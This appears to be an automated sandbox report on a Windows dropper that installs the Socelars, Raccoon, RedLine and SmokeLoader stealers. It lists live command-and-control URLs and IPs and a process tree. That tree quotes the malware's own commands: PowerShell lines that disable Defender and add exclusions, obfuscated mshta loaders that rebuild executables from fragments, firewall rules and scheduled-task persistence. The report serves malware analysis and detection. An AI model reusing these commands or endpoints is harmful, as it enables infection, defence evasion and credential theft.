Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
86s -
max time network
338s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
10/11/2021, 14:52
General
-
Target
0df647f0a2aa6c1aa1ec9426b9ef7c23eb6394f3ed29fbbdd0e9e228d24510bc.exe
-
Size
4.4MB
-
MD5
5fdb93aaa25f3b7e5a0a7d046e92df52
-
SHA1
450ea998b3090ef6922200b87e49fd0c7f543420
-
SHA256
0df647f0a2aa6c1aa1ec9426b9ef7c23eb6394f3ed29fbbdd0e9e228d24510bc
-
SHA512
85421cae4393bd86da4a1d48fbfd4f1fa14ae3c369f9f3da5f4ef5684ce18ed5576d9e221a1264f01cb9a6211113ca64a16e708671f83e946773cd0c430dd8e6
Score
10/10
Malware Config
Extracted
Family
socelars
C2
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.efxety.top/
Extracted
Family
raccoon
Botnet
2f2ad1a1aa093c5a9d17040c8efd5650a99640b5
Attributes
-
url4cnc
http://telegatt.top/oh12manymarty
http://telegka.top/oh12manymarty
http://telegin.top/oh12manymarty
https://t.me/oh12manymarty
rc4.plain
rc4.plain
Extracted
Family
redline
Botnet
Chris
C2
194.104.136.5:46013
Extracted
Family
redline
Botnet
media18
C2
91.121.67.60:2151
Extracted
Family
smokeloader
Version
2020
C2
http://directorycart.com/upload/
http://tierzahnarzt.at/upload/
http://streetofcards.com/upload/
http://ycdfzd.com/upload/
http://successcoachceo.com/upload/
http://uhvu.cn/upload/
http://japanarticle.com/upload/
rc4.i32
rc4.i32
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Downloads MZ/PE file
-
Executes dropped EXE 20 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 7 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Kills process with taskkill 7 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 47 IoCs
-
Suspicious use of AdjustPrivilegeToken 42 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\0df647f0a2aa6c1aa1ec9426b9ef7c23eb6394f3ed29fbbdd0e9e228d24510bc.exe"C:\Users\Admin\AppData\Local\Temp\0df647f0a2aa6c1aa1ec9426b9ef7c23eb6394f3ed29fbbdd0e9e228d24510bc.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue208cf4ca51e7e9.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC836F0F6\Tue208cf4ca51e7e9.exeTue208cf4ca51e7e9.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\l2zGiEWaI4l0TWxANB7pt3gG.exe"C:\Users\Admin\Pictures\Adobe Films\l2zGiEWaI4l0TWxANB7pt3gG.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\XmZDk4gDcoZKv6M7nxrk1F01.exe"C:\Users\Admin\Pictures\Adobe Films\XmZDk4gDcoZKv6M7nxrk1F01.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\Documents\QbyHB2fOiJVNlvic_hyffrKf.exe"C:\Users\Admin\Documents\QbyHB2fOiJVNlvic_hyffrKf.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\SOmPqnhkxsdmFxmf2LqcleZ4.exe"C:\Users\Admin\Pictures\Adobe Films\SOmPqnhkxsdmFxmf2LqcleZ4.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\a4JvDB_6WThShOJrK6LJh2XJ.exe"C:\Users\Admin\Pictures\Adobe Films\a4JvDB_6WThShOJrK6LJh2XJ.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\S0sXEjXwOk5kEU3K_txCPA_J.exe"C:\Users\Admin\Pictures\Adobe Films\S0sXEjXwOk5kEU3K_txCPA_J.exe"8⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PS_G_po0xVmXWBJxTPuBFHQL.exe"C:\Users\Admin\Pictures\Adobe Films\PS_G_po0xVmXWBJxTPuBFHQL.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\kYMucBPAKRn1e2mnx_FnOCCH.exe"C:\Users\Admin\Pictures\Adobe Films\kYMucBPAKRn1e2mnx_FnOCCH.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\KKxjsW00LwTr22ElphDcILgN.exe"C:\Users\Admin\Pictures\Adobe Films\KKxjsW00LwTr22ElphDcILgN.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\KKxjsW00LwTr22ElphDcILgN.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\KKxjsW00LwTr22ElphDcILgN.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\KKxjsW00LwTr22ElphDcILgN.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\KKxjsW00LwTr22ElphDcILgN.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "KKxjsW00LwTr22ElphDcILgN.exe"11⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PbMFaa2tIDZMj22_bFQiK_44.exe"C:\Users\Admin\Pictures\Adobe Films\PbMFaa2tIDZMj22_bFQiK_44.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\a4pIRO_df8DNQ5Re8jp5k4oi.exe"C:\Users\Admin\Pictures\Adobe Films\a4pIRO_df8DNQ5Re8jp5k4oi.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-T99FL.tmp\a4pIRO_df8DNQ5Re8jp5k4oi.tmp"C:\Users\Admin\AppData\Local\Temp\is-T99FL.tmp\a4pIRO_df8DNQ5Re8jp5k4oi.tmp" /SL5="$304D6,506127,422400,C:\Users\Admin\Pictures\Adobe Films\a4pIRO_df8DNQ5Re8jp5k4oi.exe"9⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\r08_nsxr4Npggnz1yzU9sdwo.exe"C:\Users\Admin\Pictures\Adobe Films\r08_nsxr4Npggnz1yzU9sdwo.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\xoqNTxHK0v5EMK2lgJ_MmHEY.exe"C:\Users\Admin\Pictures\Adobe Films\xoqNTxHK0v5EMK2lgJ_MmHEY.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\xoqNTxHK0v5EMK2lgJ_MmHEY.exe"C:\Users\Admin\Pictures\Adobe Films\xoqNTxHK0v5EMK2lgJ_MmHEY.exe" -u9⤵
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\yyjrky3lpLxk5U0XoVEjZ9ni.exe"C:\Users\Admin\Pictures\Adobe Films\yyjrky3lpLxk5U0XoVEjZ9ni.exe"6⤵
- Suspicious use of SetThreadContext
-
-
C:\Users\Admin\Pictures\Adobe Films\044p2Mpbx7Gc6oCZA_3eL2U5.exe"C:\Users\Admin\Pictures\Adobe Films\044p2Mpbx7Gc6oCZA_3eL2U5.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\hperzIKvwHlrHCHTUwvh7wPs.exe"C:\Users\Admin\Pictures\Adobe Films\hperzIKvwHlrHCHTUwvh7wPs.exe"6⤵
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\QpbgWmu_Bu0s9pL6kY1PnOpk.exe"C:\Users\Admin\Pictures\Adobe Films\QpbgWmu_Bu0s9pL6kY1PnOpk.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\DnbpHauT3PGBemk81VdL4wrD.exe"C:\Users\Admin\Pictures\Adobe Films\DnbpHauT3PGBemk81VdL4wrD.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\foOXKxLba9jTFGrd8x9HhOKR.exe"C:\Users\Admin\Pictures\Adobe Films\foOXKxLba9jTFGrd8x9HhOKR.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\XKUu3Rk3nph11obRnIL6Un2W.exe"C:\Users\Admin\Pictures\Adobe Films\XKUu3Rk3nph11obRnIL6Un2W.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\XKUu3Rk3nph11obRnIL6Un2W.exe"C:\Users\Admin\Pictures\Adobe Films\XKUu3Rk3nph11obRnIL6Un2W.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\RFqL0rgsw5xr60PQ86tWnf1U.exe"C:\Users\Admin\Pictures\Adobe Films\RFqL0rgsw5xr60PQ86tWnf1U.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4680 -s 6647⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mZf7P1CYLqkSquKoRZxEtkHJ.exe"C:\Users\Admin\Pictures\Adobe Films\mZf7P1CYLqkSquKoRZxEtkHJ.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\vA5qeN14ZIOdb3VED9dFgbmu.exe"C:\Users\Admin\Pictures\Adobe Films\vA5qeN14ZIOdb3VED9dFgbmu.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\k4tyyu3GwTIc5zwqeqJqE_ix.exe"C:\Users\Admin\Pictures\Adobe Films\k4tyyu3GwTIc5zwqeqJqE_ix.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\JHu1j6QX2ShvMxfSgiVyo7qI.exe"C:\Users\Admin\Pictures\Adobe Films\JHu1j6QX2ShvMxfSgiVyo7qI.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Tvsm4nt1IiFbpV0iZ84F2wWk.exe"C:\Users\Admin\Pictures\Adobe Films\Tvsm4nt1IiFbpV0iZ84F2wWk.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\Tvsm4nt1IiFbpV0iZ84F2wWk.exe"C:\Users\Admin\Pictures\Adobe Films\Tvsm4nt1IiFbpV0iZ84F2wWk.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\4K6Su8TZPv56zJKL8rYhokM8.exe"C:\Users\Admin\Pictures\Adobe Films\4K6Su8TZPv56zJKL8rYhokM8.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\DYQqIXYwYdYipbQYwZnD5PSP.exe"C:\Users\Admin\Pictures\Adobe Films\DYQqIXYwYdYipbQYwZnD5PSP.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3904 -s 5527⤵
- Program crash
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\4JDlJvJDcDBBE4cfYF5O9KJn.exe"C:\Users\Admin\Pictures\Adobe Films\4JDlJvJDcDBBE4cfYF5O9KJn.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\4JDlJvJDcDBBE4cfYF5O9KJn.exe" & exit7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\u1LCms6nN7tyYfl6ZR5Mgyw7.exe"C:\Users\Admin\Pictures\Adobe Films\u1LCms6nN7tyYfl6ZR5Mgyw7.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\1070598.exe"C:\Users\Admin\AppData\Roaming\1070598.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵
-
-
-
C:\Users\Admin\AppData\Roaming\4698055.exe"C:\Users\Admin\AppData\Roaming\4698055.exe"7⤵
-
-
C:\Users\Admin\AppData\Roaming\482741.exe"C:\Users\Admin\AppData\Roaming\482741.exe"7⤵
-
-
C:\Users\Admin\AppData\Roaming\267702.exe"C:\Users\Admin\AppData\Roaming\267702.exe"7⤵
-
-
C:\Users\Admin\AppData\Roaming\7542033.exe"C:\Users\Admin\AppData\Roaming\7542033.exe"7⤵
-
-
C:\Users\Admin\AppData\Roaming\8797237.exe"C:\Users\Admin\AppData\Roaming\8797237.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscRIpT: cLosE ( cREaTeOBjeCT ( "wsCriPT.sHELl" ). rUN ( "Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Roaming\8797237.exe"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If """"== """" for %k In ( ""C:\Users\Admin\AppData\Roaming\8797237.exe"" ) do taskkill /F /Im ""%~Nxk"" " , 0 , trUE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Roaming\8797237.exe"> kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ& If ""== "" for %k In ( "C:\Users\Admin\AppData\Roaming\8797237.exe" ) do taskkill /F /Im "%~Nxk"9⤵
-
C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXEkStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscRIpT: cLosE ( cREaTeOBjeCT ( "wsCriPT.sHELl" ). rUN ( "Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If ""/P6l3hjJm2mK1sJpxUmLJ""== """" for %k In ( ""C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"" ) do taskkill /F /Im ""%~Nxk"" " , 0 , trUE) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE"> kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ& If "/P6l3hjJm2mK1sJpxUmLJ"== "" for %k In ( "C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE" ) do taskkill /F /Im "%~Nxk"12⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscrIPT: cLOSE ( cREATEobjeCt ( "WSCRIPt.SheLL" ). ruN ( "C:\Windows\system32\cmd.exe /q /C echo %DatE%cl1V> 8KyK.ZNp & Echo | sET /P = ""MZ"" > hXUPL.XH & CoPY /b /Y HXUPL.XH + QR7i5Ur.BRU + wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM & StArT control .\GKq1GTV.ZnM " , 0 , TrUe ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /C echo ÚtE%cl1V> 8KyK.ZNp & Echo | sET /P = "MZ" >hXUPL.XH & CoPY /b /Y HXUPL.XH +QR7i5Ur.BRU + wZfTO2F9.TkR + 3W6U.X2 + 8Kyk.ZNp GkQ1GTV.ZNM& StArT control .\GKq1GTV.ZnM12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "13⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>hXUPL.XH"13⤵
-
-
C:\Windows\SysWOW64\control.execontrol .\GKq1GTV.ZnM13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\GKq1GTV.ZnM14⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /Im "8797237.exe"10⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\6699392.exe"C:\Users\Admin\AppData\Roaming\6699392.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1UluA8fZOOuDLonji_FTHFQc.exe"C:\Users\Admin\Pictures\Adobe Films\1UluA8fZOOuDLonji_FTHFQc.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\94ISCVbcn4L_FZiz9ad9u8ZJ.exe"C:\Users\Admin\Pictures\Adobe Films\94ISCVbcn4L_FZiz9ad9u8ZJ.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\Gid5rAfZJz0e2EdFIb3ymtwq.exe"C:\Users\Admin\Pictures\Adobe Films\Gid5rAfZJz0e2EdFIb3ymtwq.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\Gid5rAfZJz0e2EdFIb3ymtwq.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\Gid5rAfZJz0e2EdFIb3ymtwq.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\Gid5rAfZJz0e2EdFIb3ymtwq.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\Gid5rAfZJz0e2EdFIb3ymtwq.exe" ) do taskkill -im "%~NxK" -F8⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F11⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "12⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"12⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY12⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "Gid5rAfZJz0e2EdFIb3ymtwq.exe" -F9⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\tHo1hZ4dA9UbnnteyYUIUfiN.exe"C:\Users\Admin\Pictures\Adobe Films\tHo1hZ4dA9UbnnteyYUIUfiN.exe"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \7⤵
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\8⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \8⤵
-
-
